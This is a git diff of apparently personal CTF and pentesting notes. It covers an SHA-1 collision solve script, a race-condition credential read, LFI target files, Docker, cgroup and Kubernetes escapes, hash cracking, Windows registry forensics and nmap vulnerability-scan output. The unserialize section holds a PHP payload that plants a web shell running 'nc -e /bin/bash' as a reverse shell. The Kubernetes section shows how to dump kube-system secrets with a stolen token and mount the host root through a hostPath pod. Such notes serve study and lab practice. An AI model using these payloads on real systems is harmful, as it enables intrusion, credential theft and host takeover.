bump
This commit is contained in:
parent
4a016c96bd
commit
61437ed2ca
|
@ -0,0 +1,33 @@
|
||||||
|
# Hash Collisions
|
||||||
|
|
||||||
|
# SHA-1
|
||||||
|
|
||||||
|
* http://shattered.io
|
||||||
|
* The following code is taken from a writeup from [bl4ade's repo](https://github.com/bl4de/ctf/blob/master/2017/BostonKeyParty_2017/Prudentialv2/Prudentialv2_Cloud_50.md)
|
||||||
|
```python
|
||||||
|
#!/usr/bin/env python
|
||||||
|
import requests
|
||||||
|
|
||||||
|
# this is copy/paste from Hex editor - two different files with the same SHA1 checksum
|
||||||
|
name = '255044462D312E33 0A25E2E3 CFD30A0A 0A312030 206F626A 0A3C3C2F 57696474 68203220 3020522F 48656967 68742033 20302052 2F547970 65203420 3020522F 53756274 79706520 35203020 522F4669 6C746572 20362030 20522F43 6F6C6F72 53706163 65203720 3020522F 4C656E67 74682038 20302052 2F426974 73506572 436F6D70 6F6E656E 7420383E 3E0A7374 7265616D 0AFFD8FF FE002453 48412D31 20697320 64656164 21212121 21852FEC 09233975 9C39B1A1 C63C4C97 E1FFFE01 7F46DC93 A6B67E01 3B029AAA 1DB2560B 45CA67D6 88C7F84B 8C4C791F E02B3DF6 14F86DB1 690901C5 6B45C153 0AFEDFB7 6038E972 722FE7AD 728F0E49 04E046C2 30570FE9 D41398AB E12EF5BC 942BE335 42A4802D 98B5D70F 2A332EC3 7FAC3514 E74DDC0F 2CC1A874 CD0C7830 5A215664 61309789 606BD0BF 3F98CDA8 044629A1 3C68746D 6C3E0A3C 73637269 7074206C 616E6775 6167653D 6A617661 73637269 70742074 7970653D 22746578 742F6A61 76617363 72697074 223E0A3C 212D2D20 40617277 202D2D3E 0A0A7661 72206820 3D20646F 63756D65 6E742E67 6574456C 656D656E 74734279 5461674E 616D6528 2248544D 4C22295B 305D2E69 6E6E6572 48544D4C 2E636861 72436F64 65417428 31303229 2E746F53 7472696E 67283136 293B0A69 66202868 203D3D20 27373327 29207B0A 20202020 646F6375 6D656E74 2E626F64 792E696E 6E657248 544D4C20 3D20223C 5354594C 453E626F 64797B62 61636B67 726F756E 642D636F 6C6F723A 5245443B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 383B3C2F 48313E22 3B0A7D20 656C7365 207B0A20 20202064 6F63756D 656E742E 626F6479 2E696E6E 65724854 4D4C203D 20223C53 54594C45 3E626F64 797B6261 636B6772 6F756E64 2D636F6C 6F723A42 4C55453B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 393B3C2F 48313E22 3B0A7D0A 0A3C2F73 63726970 743E0A0A'
|
||||||
|
|
||||||
|
password = '25504446 2D312E33 0A25E2E3 CFD30A0A 0A312030 206F626A 0A3C3C2F 57696474 68203220 3020522F 48656967 68742033 20302052 2F547970 65203420 3020522F 53756274 79706520 35203020 522F4669 6C746572 20362030 20522F43 6F6C6F72 53706163 65203720 3020522F 4C656E67 74682038 20302052 2F426974 73506572 436F6D70 6F6E656E 7420383E 3E0A7374 7265616D 0AFFD8FF FE002453 48412D31 20697320 64656164 21212121 21852FEC 09233975 9C39B1A1 C63C4C97 E1FFFE01 7346DC91 66B67E11 8F029AB6 21B2560F F9CA67CC A8C7F85B A84C7903 0C2B3DE2 18F86DB3 A90901D5 DF45C14F 26FEDFB3 DC38E96A C22FE7BD 728F0E45 BCE046D2 3C570FEB 141398BB 552EF5A0 A82BE331 FEA48037 B8B5D71F 0E332EDF 93AC3500 EB4DDC0D ECC1A864 790C782C 76215660 DD309791 D06BD0AF 3F98CDA4 BC4629B1 3C68746D 6C3E0A3C 73637269 7074206C 616E6775 6167653D 6A617661 73637269 70742074 7970653D 22746578 742F6A61 76617363 72697074 223E0A3C 212D2D20 40617277 202D2D3E 0A0A7661 72206820 3D20646F 63756D65 6E742E67 6574456C 656D656E 74734279 5461674E 616D6528 2248544D 4C22295B 305D2E69 6E6E6572 48544D4C 2E636861 72436F64 65417428 31303229 2E746F53 7472696E 67283136 293B0A69 66202868 203D3D20 27373327 29207B0A 20202020 646F6375 6D656E74 2E626F64 792E696E 6E657248 544D4C20 3D20223C 5354594C 453E626F 64797B62 61636B67 726F756E 642D636F 6C6F723A 5245443B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 383B3C2F 48313E22 3B0A7D20 656C7365 207B0A20 20202064 6F63756D 656E742E 626F6479 2E696E6E 65724854 4D4C203D 20223C53 54594C45 3E626F64 797B6261 636B6772 6F756E64 2D636F6C 6F723A42 4C55453B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 393B3C2F 48313E22 3B0A7D0A 0A3C2F73 63726970 743E0A0A'
|
||||||
|
|
||||||
|
print '[+] create URL decoded strings to send as GET parameters [name] and [password]...'
|
||||||
|
name = ''.join(name.split(' '))
|
||||||
|
password = ''.join(password.split(' '))
|
||||||
|
|
||||||
|
namestr = ''.join(['%' + name[i] + name[i + 1]
|
||||||
|
for i in range(0, len(name)) if i % 2 == 0])
|
||||||
|
|
||||||
|
passwordstr = ''.join(['%' + password[j] + password[j + 1]
|
||||||
|
for j in range(0, len(password)) if j % 2 == 0])
|
||||||
|
|
||||||
|
print '[+] sending request to http://54.202.82.13/?name=[name]&password=[password]'
|
||||||
|
|
||||||
|
u = 'http://54.202.82.13/?name={}&password={}'.format(namestr, passwordstr)
|
||||||
|
|
||||||
|
resp = requests.get(u, headers={
|
||||||
|
'Host': '54.202.82.13'
|
||||||
|
})
|
||||||
|
```
|
|
@ -0,0 +1,22 @@
|
||||||
|
# Racing Conditions
|
||||||
|
|
||||||
|
## Read files from another user
|
||||||
|
|
||||||
|
* The file of interest needs to be opened by a process which is a suid binary (here named `read_reds`) and creates a file descriptor to it
|
||||||
|
* The file of intereset is called `root_credentials` and is owned by root
|
||||||
|
* Create a file
|
||||||
|
```sh
|
||||||
|
touch yo
|
||||||
|
```
|
||||||
|
* Compile `gistfile.txt` from [live overflow's repo](https://gist.github.com/LiveOverflow/590edaf5cf3adeea31c73e303692dec0)
|
||||||
|
```sh
|
||||||
|
gcc gistfile.c -o rename_file
|
||||||
|
```
|
||||||
|
* Inside session 1 start the binary
|
||||||
|
```sh
|
||||||
|
./rename_file yo root_credentials
|
||||||
|
```
|
||||||
|
* Inside session to try to read `root_credentials` until it succeeds
|
||||||
|
```sh
|
||||||
|
./read_creds root_credentials
|
||||||
|
```
|
|
@ -50,6 +50,7 @@ curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20..
|
||||||
* `/etc/profile`
|
* `/etc/profile`
|
||||||
* `/proc/version`
|
* `/proc/version`
|
||||||
* `/etc/passwd`
|
* `/etc/passwd`
|
||||||
|
* `/etc/apache2/.htpasswd`
|
||||||
* `/etc/shadow`
|
* `/etc/shadow`
|
||||||
* `/etc/group`
|
* `/etc/group`
|
||||||
* `/etc/motd`
|
* `/etc/motd`
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
# Unserialize
|
# Unserialize
|
||||||
|
|
||||||
* [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize/)
|
* [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize)
|
||||||
|
|
||||||
* Serialize via
|
* Serialize via
|
||||||
```php
|
```php
|
||||||
|
@ -18,3 +18,12 @@ class FormSubmit {
|
||||||
print urlencode(serialize(new FormSubmit));
|
print urlencode(serialize(new FormSubmit));
|
||||||
?>
|
?>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
```php
|
||||||
|
<?php class file
|
||||||
|
{
|
||||||
|
public $file = 'rev.php'; public $data = '<?php shell_exec("nc -e /bin/bash $TARGET_IP 4455"); ?>';
|
||||||
|
}
|
||||||
|
echo (serialize(new file));
|
||||||
|
?>
|
||||||
|
```
|
||||||
|
|
|
@ -0,0 +1,116 @@
|
||||||
|
# Windows Registry
|
||||||
|
|
||||||
|
## Regedit Keys
|
||||||
|
* HKEY_CURRENT_USER (HKCU), inside HKU
|
||||||
|
* HKEY_USERS (HKU)
|
||||||
|
* HKEY_LOCAL_MACHINE (HKLM)
|
||||||
|
* HKEY_CLASSES_ROOT (HKCR), stored in HKLM and HKU
|
||||||
|
* `HKEY_CURREN_USER\Software\Classes` for settings of interactive user
|
||||||
|
* `HKEY_LOCAL_MACHINE\Software\Classes` to change default settings
|
||||||
|
* HKEY_CURRENT_CONFIG
|
||||||
|
|
||||||
|
## Paths
|
||||||
|
* `C:\Windows\System32\Config`
|
||||||
|
* Default -> `HKEY_USERS\DEFAULT`
|
||||||
|
* SAM -> `HKEY_LOCAL_MACHINE\SAM`
|
||||||
|
* SECURITY -> `HKEY_LOCAL_MACHINE\Security`
|
||||||
|
* SOFTWARE -> `HKEY_LOCAL_MACHINE\Software`
|
||||||
|
* SYSTEM -> `HKEY_LOCAL_MACHINE\System`
|
||||||
|
|
||||||
|
* `C:\Users\<username>\`
|
||||||
|
* NTUSER.DAT -> `HKEY_CURRENT_USER` , hidden file
|
||||||
|
* `C:\Users\<username>\AppData\Local\Microsoft\Windows`
|
||||||
|
* USRCLASS.DAT -> `HKEY_CURRENT_USER\Sofware\CLASSES`, hidden file
|
||||||
|
|
||||||
|
* `C:\Windows\AppCompat\Programs\Amcache.hve`
|
||||||
|
|
||||||
|
### Transaction Logs
|
||||||
|
* Saved inside the same directory as the hive which was altered.
|
||||||
|
|
||||||
|
### Backups
|
||||||
|
* Saved every ten days
|
||||||
|
* `C:\Windows\System32\Config\RegBack`
|
||||||
|
|
||||||
|
## Data Acquisition
|
||||||
|
* Tools
|
||||||
|
* `Autopsy`
|
||||||
|
* `FTK Imager`, does not copy `Amcache.hve`
|
||||||
|
* `KAPE`, preserves directory tree
|
||||||
|
* `Registry Viewer`
|
||||||
|
* `Zimmerman's Registry Explorer`, uses transaction logs as well
|
||||||
|
* ` AppCompatCache Parser`
|
||||||
|
* `RegRipper`, cli and gui
|
||||||
|
|
||||||
|
## System Information
|
||||||
|
* OS Version -> `SOFTWARE\Microsoft\Windows NT\CurrentVersion`
|
||||||
|
* Computer Name -> `SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName`
|
||||||
|
* Time Zone `SYSTEM\CurrentControlSet\Control\TimeZoneInformation`
|
||||||
|
* Network Interfaces -> `SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces`
|
||||||
|
* Past connected networks -> `SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged` and `SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Managed`
|
||||||
|
* Services -> `SYSTEM\CurrentControlSet\Services`
|
||||||
|
* Service will start at boot with `start` key value `0x02`
|
||||||
|
* Users, SAM -> `SAM\Domains\Account\Users`
|
||||||
|
|
||||||
|
|
||||||
|
### Control Sets
|
||||||
|
* `ControlSet001` -> last boot
|
||||||
|
* `ControlSet002` -> last known good
|
||||||
|
* `HKLM\SYSTEM\CurrentControlSet` -> live
|
||||||
|
|
||||||
|
* Can be found under:
|
||||||
|
* `SYSTEM\Select\Current` shows the used control set
|
||||||
|
* `SYSTEM\Select\LastKnownGood`
|
||||||
|
|
||||||
|
## Autostart Programs
|
||||||
|
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`
|
||||||
|
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\RunOnce`
|
||||||
|
* `SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce`
|
||||||
|
* `SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run`
|
||||||
|
* `SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
|
||||||
|
|
||||||
|
## Recent Files
|
||||||
|
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs`, e.g. xml, pdf, jpg
|
||||||
|
* Office files -> `NTUSER.DAT\Software\Microsoft\Office\VERSION`, `NTUSER.DAT\Software\Microsoft\Office\15.0\Word`
|
||||||
|
* Office 365 -> `NTUSER.DAT\Software\Microsoft\Office\VERSION\UserMRU\LiveID_####\FileMRU`
|
||||||
|
|
||||||
|
## ShellBags
|
||||||
|
* `USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\Bags`
|
||||||
|
* `USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU`
|
||||||
|
* `NTUSER.DAT\Software\Microsoft\Windows\Shell\BagMRU`
|
||||||
|
* `NTUSER.DAT\Software\Microsoft\Windows\Shell\Bags`
|
||||||
|
|
||||||
|
## Last Open/Saved/Visited Dialog MRUs
|
||||||
|
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePIDlMRU`
|
||||||
|
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU`
|
||||||
|
|
||||||
|
## Explorer Address/Search Bars
|
||||||
|
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths`
|
||||||
|
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\WordWheelQuery`
|
||||||
|
|
||||||
|
## User Assist
|
||||||
|
* GUI applications launched by the user
|
||||||
|
* `NTUSER.DAT\Software\Microsoft\Windows\Currentversion\Explorer\UserAssist\{GUID}\Count`
|
||||||
|
|
||||||
|
## Shim Cache
|
||||||
|
* Application Compatibility, AppCompatCache
|
||||||
|
* `SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache`
|
||||||
|
* Use `AppCompatCacheParser.exe --csv <path to save output> -f <path to SYSTEM hive for data parsing> -c <control set to parse>`
|
||||||
|
|
||||||
|
### AmCache
|
||||||
|
* `C:\Windows\appcompat\Programs\Amcache.hve`
|
||||||
|
* Last executed app -> `Amcache.hve\Root\File\{Volume GUID}\`
|
||||||
|
* Saves SHA1 of the last executed app
|
||||||
|
|
||||||
|
## Background Activity Monitor/Desktop Activity Moderator BAM/DAM
|
||||||
|
* Saves full path of executed apps
|
||||||
|
* `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}`
|
||||||
|
* `SYSTEM\CurrentControlSet\Services\dam\UserSettings\{SID}`
|
||||||
|
|
||||||
|
## Devices
|
||||||
|
* Identification
|
||||||
|
* USB -> `SYSTEM\CurrentControlSet\Enum\USBTOR`, `SYSTEM\CurrentControlSet\Enum\USB`
|
||||||
|
* Device name -> `SOFTWARE\Microsoft\Windows Portable Devices\Devices`
|
||||||
|
* First time connected -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0064`
|
||||||
|
* Last time connected -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0066`
|
||||||
|
* Last removal time -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0067`
|
||||||
|
|
|
@ -0,0 +1,19 @@
|
||||||
|
# SMB Response Request
|
||||||
|
|
||||||
|
* Network traffic of the SMB handshake is needed
|
||||||
|
* Fields are
|
||||||
|
* username
|
||||||
|
* domain
|
||||||
|
* server challenge
|
||||||
|
* ntproofstring
|
||||||
|
* NTLMv2Response with ommited hex of type like 'ntlmProofStr' at the start
|
||||||
|
|
||||||
|
## Usage
|
||||||
|
|
||||||
|
* Format the fields
|
||||||
|
```sh
|
||||||
|
username::domain:serverChallenge:ntproofstring:NTLMv2Response
|
||||||
|
```
|
||||||
|
|
||||||
|
* Use john to decrypt
|
||||||
|
|
|
@ -56,8 +56,6 @@ groups
|
||||||
* Mount the host volume and chroot to it, need alpine image.
|
* Mount the host volume and chroot to it, need alpine image.
|
||||||
```sh
|
```sh
|
||||||
docker images
|
docker images
|
||||||
```sh
|
|
||||||
```sh
|
|
||||||
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
|
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
|
||||||
```
|
```
|
||||||
or
|
or
|
||||||
|
@ -99,6 +97,7 @@ echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit
|
||||||
chmod a+x /exploit
|
chmod a+x /exploit
|
||||||
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
|
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
|
||||||
```
|
```
|
||||||
|
* The file may appear outside the container on the host system
|
||||||
## Check fdisk
|
## Check fdisk
|
||||||
|
|
||||||
* `fdisk -l` and `lsblk`, host bulk device may be exposed
|
* `fdisk -l` and `lsblk`, host bulk device may be exposed
|
||||||
|
|
|
@ -0,0 +1,56 @@
|
||||||
|
# Kubernetes
|
||||||
|
|
||||||
|
## Account Token
|
||||||
|
* Snatch an account token from inside a pod
|
||||||
|
* Use it via kubectl, watch out for authorizations and namespaces
|
||||||
|
```sh
|
||||||
|
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 auth can-i --list
|
||||||
|
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get namespaces
|
||||||
|
```
|
||||||
|
* Save secrets from namespaces as yaml file
|
||||||
|
```sh
|
||||||
|
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get secrets -o yaml -n kube-system > kube-system.yml
|
||||||
|
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get secrets -n kube-system
|
||||||
|
```
|
||||||
|
* Specify secret
|
||||||
|
```sh
|
||||||
|
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get secrets flag -n kube-system -o yaml
|
||||||
|
```
|
||||||
|
|
||||||
|
## Privilege Escalation
|
||||||
|
* [appsecco's blog](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216)
|
||||||
|
* Show images via
|
||||||
|
```sh
|
||||||
|
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get pods
|
||||||
|
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get pod <image> -o yaml
|
||||||
|
```
|
||||||
|
* Use a found image to create the following yaml file
|
||||||
|
```yaml
|
||||||
|
apiVersion: v1
|
||||||
|
kind: Pod
|
||||||
|
metadata:
|
||||||
|
name: attacking-pod
|
||||||
|
spec:
|
||||||
|
containers:
|
||||||
|
- image: <imageName>
|
||||||
|
name: host
|
||||||
|
command: [ "/bin/sh", "-c", "--" ]
|
||||||
|
args: [ "while true; do sleep 30; done;" ]
|
||||||
|
volumeMounts:
|
||||||
|
- mountPath: /host
|
||||||
|
name: host
|
||||||
|
volumes:
|
||||||
|
- name: host
|
||||||
|
hostPath:
|
||||||
|
path: /
|
||||||
|
type: Directory
|
||||||
|
```
|
||||||
|
* `/` of the node is mounted to `/host` inside the new pod
|
||||||
|
* Create the pod via
|
||||||
|
```sh
|
||||||
|
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 apply -f <filename.yaml>
|
||||||
|
```
|
||||||
|
* Run an interactive session on the pod
|
||||||
|
```sh
|
||||||
|
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 exec -it attacking-pod -- /bin/bassh
|
||||||
|
```
|
|
@ -0,0 +1,3 @@
|
||||||
|
# Pithus Mobile Threat Intelligence
|
||||||
|
|
||||||
|
* https://beta.pithus.org
|
|
@ -27,6 +27,7 @@ find / -type f -name "authorized_keys" -o -name "id_rsa" 2>/dev/null
|
||||||
* Weak permissions
|
* Weak permissions
|
||||||
* Umask
|
* Umask
|
||||||
* Unshadow via `unshadow /etc/passd /etc/shadow > unshadow.txt` and john or hashcat.
|
* Unshadow via `unshadow /etc/passd /etc/shadow > unshadow.txt` and john or hashcat.
|
||||||
|
* e.g. `john --wordlist=./wordlist --format=crypt hash`
|
||||||
* SUID
|
* SUID
|
||||||
* list
|
* list
|
||||||
```sh
|
```sh
|
||||||
|
|
|
@ -0,0 +1,5 @@
|
||||||
|
# Nmap 7.92 scan initiated Sun Jan 16 00:15:49 2022 as: nmap --vv -sC -sV --script vuln -oA nmap-full 10.10.160.69
|
||||||
|
# Ports scanned: TCP(1000;1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389) UDP(0;) SCTP(0;) PROTOCOLS(0;)
|
||||||
|
Host: 10.10.160.69 () Status: Up
|
||||||
|
Host: 10.10.160.69 () Ports: 22/open/tcp//ssh//OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.29 ((Ubuntu))/, 3306/open/tcp//mysql//MySQL 5.5.5-10.1.48-MariaDB-0ubuntu0.18.04.1/ Ignored State: closed (997)
|
||||||
|
# Nmap done at Sun Jan 16 00:16:48 2022 -- 1 IP address (1 host up) scanned in 58.58 seconds
|
|
@ -0,0 +1,206 @@
|
||||||
|
# Nmap 7.92 scan initiated Sun Jan 16 00:15:49 2022 as: nmap --vv -sC -sV --script vuln -oA nmap-full 10.10.160.69
|
||||||
|
Nmap scan report for 10.10.160.69
|
||||||
|
Host is up, received echo-reply ttl 63 (0.091s latency).
|
||||||
|
Scanned at 2022-01-16 00:16:00 CET for 48s
|
||||||
|
Not shown: 997 closed tcp ports (reset)
|
||||||
|
PORT STATE SERVICE REASON VERSION
|
||||||
|
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
|
||||||
|
| vulners:
|
||||||
|
| cpe:/a:openbsd:openssh:7.6p1:
|
||||||
|
| MSF:ILITIES/UBUNTU-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2019-6111/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/SUSE-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2019-6111/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/SUSE-CVE-2019-25017/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2019-25017/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/REDHAT_LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-6111/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/REDHAT-OPENSHIFT-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/REDHAT-OPENSHIFT-CVE-2019-6111/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-6111/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/OPENBSD-OPENSSH-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2019-6111/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/IBM-AIX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/IBM-AIX-CVE-2019-6111/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-6111/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-6111/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-6111/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-6111/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/GENTOO-LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/GENTOO-LINUX-CVE-2019-6111/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/F5-BIG-IP-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2019-6111/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/DEBIAN-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2019-6111/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/CENTOS_LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2019-6111/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/AMAZON_LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/AMAZON_LINUX-CVE-2019-6111/ *EXPLOIT*
|
||||||
|
